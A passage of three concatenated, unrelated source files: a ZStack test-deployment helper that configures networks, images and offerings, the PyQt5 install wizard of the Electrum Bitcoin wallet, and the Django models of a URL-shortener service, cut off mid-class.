zone_name= None, l3_name = None):
'''
Call by only adding an IP range. If the IP range is in L3 config,
add_l3_network will add ip range direclty.
deployConfig is a xmlobject. If using standard net_operation, please
check net_operations.add_ip_range(test_util.IpRangeOption())
'''
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
l3networks = []
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
l2networks = []
if xmlobject.has_element(zone, 'l2Networks.l2NoVlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2NoVlanNetwork))
if xmlobject.has_element(zone, 'l2Networks.l2VlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2VlanNetwork))
for l2 in l2networks:
if xmlobject.has_element(l2, 'l3Networks.l3BasicNetwork'):
l3networks.extend(xmlobject.safe_list(l2.l3Networks.l3BasicNetwork))
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
for zone_duplication in range(duplication):
for l3 in l3networks:
if l3_name and l3_name != l3.name_:
continue
if not xmlobject.has_element(l3, 'ipRange'):
continue
if zone_duplication == 0:
l3Name = l3.name_
else:
l3Name = generate_dup_name(l3.name_, zone_duplication, 'z')
l3_invs = res_ops.get_resource(res_ops.L3_NETWORK, session_uuid, name = l3Name)
l3_inv = get_first_item_from_list(l3_invs, 'L3 Network', l3Name, 'IP range')
do_add_ip_range(l3.ipRange, l3_inv.uuid, session_uuid, \
ip_range_name)
def do_add_ip_range(ip_range_xml_obj, l3_uuid, session_uuid, \
ip_range_name = None):
for ir in xmlobject.safe_list(ip_range_xml_obj):
if ip_range_name and ip_range_name != ir.name_:
continue
action = api_actions.AddIpRangeAction()
action.sessionUuid = session_uuid
action.description = ir.description__
action.endIp = ir.endIp_
action.gateway = ir.gateway_
action.l3NetworkUuid = l3_uuid
action.name = ir.name_
action.netmask = ir.netmask_
action.startIp = ir.startIp_
try:
evt = action.run()
except Exception as e:
exc_info.append(sys.exc_info())
raise e
test_util.test_logger(jsonobject.dumps(evt))
#Add Network Service
def add_network_service(deployConfig, session_uuid):
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
l3networks = []
for zone in xmlobject.safe_list(deployConfig.zones.zone):
l2networks = []
if xmlobject.has_element(zone, 'l2Networks.l2NoVlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2NoVlanNetwork))
if xmlobject.has_element(zone, 'l2Networks.l2VlanNetwork'):
l2networks.extend(xmlobject.safe_list(zone.l2Networks.l2VlanNetwork))
for l2 in l2networks:
if xmlobject.has_element(l2, 'l3Networks.l3BasicNetwork'):
l3networks.extend(xmlobject.safe_list(l2.l3Networks.l3BasicNetwork))
providers = {}
action = api_actions.QueryNetworkServiceProviderAction()
action.sessionUuid = session_uuid
action.conditions = []
try:
reply = action.run()
except Exception as e:
exc_info.append(sys.exc_info())
raise e
for pinv in reply:
providers[pinv.name] = pinv.uuid
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
for zone_duplication in range(duplication):
for l3 in l3networks:
if not xmlobject.has_element(l3, 'networkService'):
continue
if zone_duplication == 0:
l3_name = l3.name_
else:
l3_name = generate_dup_name(l3.name_, zone_duplication, 'z')
l3_invs = res_ops.get_resource(res_ops.L3_NETWORK, session_uuid, name = l3_name)
l3_inv = get_first_item_from_list(l3_invs, 'L3 Network', l3_name, 'Network Service')
do_add_network_service(l3.networkService, l3_inv.uuid, \
providers, session_uuid)
def do_add_network_service(net_service_xml_obj, l3_uuid, providers, \
session_uuid):
allservices = {}
for ns in xmlobject.safe_list(net_service_xml_obj):
puuid = providers.get(ns.provider_)
if not puuid:
raise test_util.TestError('cannot find network service provider[%s], it may not have been added' % ns.provider_)
servs = []
for nst in xmlobject.safe_list(ns.serviceType):
servs.append(nst.text_)
allservices[puuid] = servs
action = api_actions.AttachNetworkServiceToL3NetworkAction()
action.sessionUuid = session_uuid
action.l3NetworkUuid = l3_uuid
action.networkServices = allservices
try:
evt = action.run()
except Exception as e:
exc_info.append(sys.exc_info())
raise e
test_util.test_logger(jsonobject.dumps(evt))
#Add Image
def add_image(scenarioConfig, scenarioFile, deployConfig, session_uuid):
def _add_image(action):
increase_image_thread()
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
finally:
decrease_image_thread()
if not xmlobject.has_element(deployConfig, 'images.image'):
return
for i in xmlobject.safe_list(deployConfig.images.image):
for bsref in xmlobject.safe_list(i.backupStorageRef):
bss = res_ops.get_resource(res_ops.BACKUP_STORAGE, session_uuid, name=bsref.text_)
bs = get_first_item_from_list(bss, 'backup storage', bsref.text_, 'image')
action = api_actions.AddImageAction()
action.sessionUuid = session_uuid
#TODO: account uuid will be removed later.
action.accountUuid = inventory.INITIAL_SYSTEM_ADMIN_UUID
action.backupStorageUuids = [bs.uuid]
action.bits = i.bits__
if not action.bits:
action.bits = 64
action.description = i.description__
action.format = i.format_
action.mediaType = i.mediaType_
action.guestOsType = i.guestOsType__
if not action.guestOsType:
action.guestOsType = 'unknown'
action.platform = i.platform__
if not action.platform:
action.platform = 'Linux'
action.hypervisorType = i.hypervisorType__
action.name = i.name_
action.url = i.url_
action.timeout = 1800000
if i.hasattr('system_'):
action.system = i.system_
if i.hasattr('systemTags_'):
action.systemTags = i.systemTags_.split(',')
thread = threading.Thread(target = _add_image, args = (action, ))
print 'before add image1: %s' % i.url_
wait_for_image_thread_queue()
print 'before add image2: %s' % i.url_
thread.start()
print 'add image: %s' % i.url_
print 'all images add command are executed'
wait_for_thread_done(True)
print 'all images have been added'
#Add Disk Offering
def add_disk_offering(scenarioConfig, scenarioFile, deployConfig, session_uuid):
def _add_disk_offering(disk_offering_xml_obj, session_uuid):
action = api_actions.CreateDiskOfferingAction()
action.sessionUuid = session_uuid
action.name = disk_offering_xml_obj.name_
action.description = disk_offering_xml_obj.description_
action.diskSize = sizeunit.get_size(disk_offering_xml_obj.diskSize_)
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
if not xmlobject.has_element(deployConfig, 'diskOfferings.diskOffering'):
return
for disk_offering_xml_obj in \
xmlobject.safe_list(deployConfig.diskOfferings.diskOffering):
thread = threading.Thread(target = _add_disk_offering, \
args = (disk_offering_xml_obj, session_uuid))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
#Add Instance Offering
def add_instance_offering(scenarioConfig, scenarioFile, deployConfig, session_uuid):
def _add_io(instance_offering_xml_obj, session_uuid):
action = api_actions.CreateInstanceOfferingAction()
action.sessionUuid = session_uuid
action.name = instance_offering_xml_obj.name_
action.description = instance_offering_xml_obj.description__
action.cpuNum = instance_offering_xml_obj.cpuNum_
#action.cpuSpeed = instance_offering_xml_obj.cpuSpeed_
if instance_offering_xml_obj.memorySize__:
action.memorySize = sizeunit.get_size(instance_offering_xml_obj.memorySize_)
elif instance_offering_xml_obj.memoryCapacity_:
action.memorySize = sizeunit.get_size(instance_offering_xml_obj.memoryCapacity_)
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
if not xmlobject.has_element(deployConfig, \
'instanceOfferings.instanceOffering'):
return
for instance_offering_xml_obj in \
xmlobject.safe_list(deployConfig.instanceOfferings.instanceOffering):
thread = threading.Thread(target = _add_io, \
args = (instance_offering_xml_obj, session_uuid, ))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
def add_pxe_server(scenarioConfig, scenarioFile, deployConfig, session_uuid):
def _add_pxe_server(pxe):
action = api_actions.CreateBaremetalPxeServerAction()
action.name = pxe.name_
action.sessionUuid = session_uuid
action.description = pxe.description__
action.dhcpInterface = pxe.dhcpInterface_
action.dhcpRangeBegin = pxe.dhcpRangeBegin_
action.dhcpRangeEnd = pxe.dhcpRangeEnd_
action.dhcpRangeNetmask = pxe.dhcpRangeNetmask_
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except Exception as e:
exc_info.append(sys.exc_info())
if not xmlobject.has_element(deployConfig, 'pxe'):
return
pxe = deployConfig.pxe
thread = threading.Thread(target=_add_pxe_server, args=(pxe,))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
#Add VM -- Pass
def _thread_for_action(action):
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
#Add Virtual Router Offering
def add_virtual_router(scenarioConfig, scenarioFile, deployConfig, session_uuid, l3_name = None, \
zone_name = None):
if not xmlobject.has_element(deployConfig, 'instanceOfferings.virtualRouterOffering'):
return
for i in xmlobject.safe_list(deployConfig.instanceOfferings.virtualRouterOffering):
if l3_name and l3_name != i.managementL3NetworkRef.text_:
continue
if zone_name and zone_name != i.zoneRef.text_:
continue
print "continue l3_name: %s; zone_name: %s" % (l3_name, zone_name)
action = api_actions.CreateVirtualRouterOfferingAction()
action.sessionUuid = session_uuid
action.name = i.name_
action.description = i.description__
action.cpuNum = i.cpuNum_
#action.cpuSpeed = i.cpuSpeed_
if i.memorySize__:
action.memorySize = sizeunit.get_size(i.memorySize_)
elif i.memoryCapacity_:
action.memorySize = sizeunit.get_size(i.memoryCapacity_)
action.isDefault = i.isDefault__
action.type = 'VirtualRouter'
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=i.zoneRef.text_)
zinv = get_first_item_from_list(zinvs, 'zone', i.zoneRef.text_, 'virtual router offering')
action.zoneUuid = zinv.uuid
cond = res_ops.gen_query_conditions('zoneUuid', '=', zinv.uuid)
cond1 = res_ops.gen_query_conditions('name', '=', \
i.managementL3NetworkRef.text_, cond)
minvs = res_ops.query_resource(res_ops.L3_NETWORK, cond1, \
session_uuid)
minv = get_first_item_from_list(minvs, 'Management L3 Network', i.managementL3NetworkRef.text_, 'virtualRouterOffering')
action.managementNetworkUuid = minv.uuid
if xmlobject.has_element(i, 'publicL3NetworkRef'):
cond1 = res_ops.gen_query_conditions('name', '=', \
i.publicL3NetworkRef.text_, cond)
pinvs = res_ops.query_resource(res_ops.L3_NETWORK, cond1, \
session_uuid)
pinv = get_first_item_from_list(pinvs, 'Public L3 Network', i.publicL3NetworkRef.text_, 'virtualRouterOffering')
action.publicNetworkUuid = pinv.uuid
iinvs = res_ops.get_resource(res_ops.IMAGE, session_uuid, \
name=i.imageRef.text_)
iinv = get_first_item_from_list(iinvs, 'Image', i.imageRef.text_, 'virtualRouterOffering')
action.imageUuid = iinv.uuid
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
def deploy_initial_database(deploy_config, scenario_config = None, scenario_file = None):
operations = [
add_backup_storage,
add_zone,
add_l2_network,
add_primary_storage,
add_cluster,
add_host,
add_l3_network,
add_image,
add_disk_offering,
add_instance_offering,
add_virtual_router,
add_pxe_server
]
for operation in operations:
session_uuid = account_operations.login_as_admin()
try:
operation(scenario_config, scenario_file, deploy_config, session_uuid)
except Exception as e:
test_util.test_logger('[Error] zstack deployment meets exception when doing: %s . The real exception are:.' % operation.__name__)
print('----------------------Exception Reason------------------------')
traceback.print_exc(file=sys.stdout)
print('-------------------------Reason End---------------------------\n')
raise e
finally:
account_operations.logout(session_uuid)
test_util.test_logger('[Done] zstack initial database was created successfully.')
def generate_dup_name(origin_name, num, prefix=None):
if num == 0:
return origin_name
if prefix:
return str(origin_name) + '-' + str(prefix) + str(num)
else:
return str(origin_name) + '-' + str(num)
def generate_dup_host_ip(origin_ip, zone_ref, cluster_ref, host_ref):
ip_fields = origin_ip.split('.')
ip_fields[1] = str(int(ip_fields[1]) + zone_ref)
ip_fields[2] = str(int(ip_fields[2]) + cluster_ref)
ip_fields[3] = str(int(ip_fields[3]) + host_ref)
return '.'.join(ip_fields)
image_thread_queue = 0
@lock.lock('image_thread')
def increase_image_thread():
global image_thread_queue
image_thread_queue += 1
@lock.lock('image_thread')
def decrease_image_thread():
global image_thread_queue
image_thread_queue -= 1
def wait_for_image_thread_queue():
while image_thread_queue >= IMAGE_THREAD_LIMIT:
time.sleep(1)
print 'image_thread_queue: %d' % image_thread_queue
def wait_for_thread_queue():
while threading.active_count() > DEPLOY_THREAD_LIMIT:
check_thread_exception()
time.sleep(1)
def cleanup_exc_info():
exc_info = []
def check_thread_exception():
if exc_info:
info1 = exc_info[0][1]
info2 = exc_info[0][2]
cleanup_exc_info()
raise info1, None, info2
def wait_for_thread_done(report = False):
while threading.active_count() > 1:
check_thread_exception()
time.sleep(1)
if report:
print 'thread count: %d' % threading.active_count()
check_thread_exception()
def get_nfs_ip_for_seperate_network(scenarioConfig, virtual_host_ip, nfs_ps_name):
import scenario_operations as sce_ops
zstack_management_ip = scenarioConfig.basicConfig.zstackManagementIp.text_
storageNetworkUuid = None
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
for l3Network in xmlobject.safe_list(vm.l3Networks.l3Network):
if xmlobject.has_element(l3Network, 'primaryStorageRef') and l3Network.primaryStorageRef.text_ == nfs_ps_name:
storageNetworkUuid = l3Network.uuid_
cond = res_ops.gen_query_conditions('vmNics.ip', '=', virtual_host_ip)
vm_inv_nics = sce_ops.query_resource(zstack_management_ip, res_ops.VM_INSTANCE, cond).inventories[0].vmNics
if len(vm_inv_nics) < 2:
test_util.test_fail("virtual host:%s not has 2+ nics as expected, incorrect for seperate network case" %(virtual_host_ip))
for vm_inv_nic in vm_inv_nics:
if vm_inv_nic.l3NetworkUuid == storageNetworkUuid:
return vm_inv_nic.ip
return None
|
installwizard.py
|
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PW_NEW
class GoBack(Exception):
pass
MSG_GENERATING_WAIT = _("Electrum is generating your addresses, please wait...")
MSG_ENTER_ANYTHING = _("Please enter a seed phrase, a master key, a list of "
"Bitcoin addresses, or a list of private keys")
MSG_ENTER_SEED_OR_MPK = _("Please enter a seed phrase or a master key (xpub or xprv):")
MSG_COSIGNER = _("Please enter the master public key of cosigner #%d:")
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_RESTORE_PASSPHRASE = \
_("Please enter your seed derivation passphrase. "
"Note: this is NOT your encryption password. "
"Leave this field empty if you did not use one or are unsure.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
try:
self.storage = WalletStorage(path, manual_upgrades=True)
except IOError:
self.storage = None
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif self.storage.file_exists() and self.storage.is_encrypted():
msg = _("This file is encrypted.") + '\n' + _('Enter your password or choose another file.')
pw = True
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if self.loop.exec_() != 2: # 2 = next
return
if not self.storage.file_exists():
break
if self.storage.file_exists() and self.storage.is_encrypted():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '%s' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?"%path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
if self.storage.requires_upgrade():
self.storage.upgrade()
self.wallet = Wallet(self.storage)
return self.wallet
action = self.storage.get_action()
if action and action != 'new':
self.hide()
msg = _("The file '%s' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?") % path
if not self.question(msg):
if self.question(_("Do you want to delete '%s'?") % path):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid):
slayout = KeysLayout(parent=self, title=message, is_valid=is_valid)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next):
return self.text_input(title, message, is_valid)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg):
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
t = threading.Thread(target = task)
t.start()
t.join()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning=''):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
models.py
|
from django.db import models
from django.utils import timezone
from django.utils.crypto import get_random_string
from django.conf import settings
import qrcode
import os
class User(models.Model):
email = models.EmailField(max_length=100)
password = models.CharField(max_length=40)
signup_at = models.DateTimeField(default=timezone.now)
last_login_at = models.DateTimeField(blank=True, null=True)
email_verify = models.CharField(max_length=32, blank=True)
verified = models.BooleanField(default=False)
def __str__(self):
return self.email
class Token(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
token = models.CharField(max_length=40)
def __str__(self):
return self.user.email
class Link(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)
url_id = models.CharField(max_length=65, blank=True)
long_url = models.TextField()
password = models.CharField(max_length=40, blank=True)
has_password = models.BooleanField(default=False)
dateTime = models.DateTimeField(default=timezone.now)
expiration_date = models.DateTimeField(blank=True, null=True)
views_count = models.IntegerField(default=0)
qr_img = models.ImageField(blank=True)
expired = models.BooleanField(default=False)
banned = models.BooleanField(default=False)
def save(self, *args, **kwargs):
if not self.url_id:
self.url_id = get_random_string(length=6)
if self.password:
self.has_password = True
if self.user:
qr_img_path = './Api/QRs/' + self.url_id + '.png'
qr = qrcode.make(('http://%s/' % settings.HOST_NAME) + self.url_id)
qr.save(qr_img_path)
self.qr_img = qr_img_path
super(Link, self).save(*args, **kwargs)
def delete(self, *args, **kwargs):
if self.user:
os.remove('./Api/QRs/' + self.url_id + '.png')
super(Link, self).delete(*args, **kwargs)
def __str__(self):
return self.url_id + ' - ' + self.long_url
class Click(models.Model):
short_url = models.ForeignKey(Link, on_delete=models.CASCADE)
dateTime = models.DateTimeField(default=timezone.now)
os = models.CharField(max_length=20)
browser = models.CharField(max_length=20)
device = models.CharField(max_length=20)
country = models.CharField(max_length=20, blank=True)
def __str__(self):
return str(self.dateTime)
class Report(models.Model):
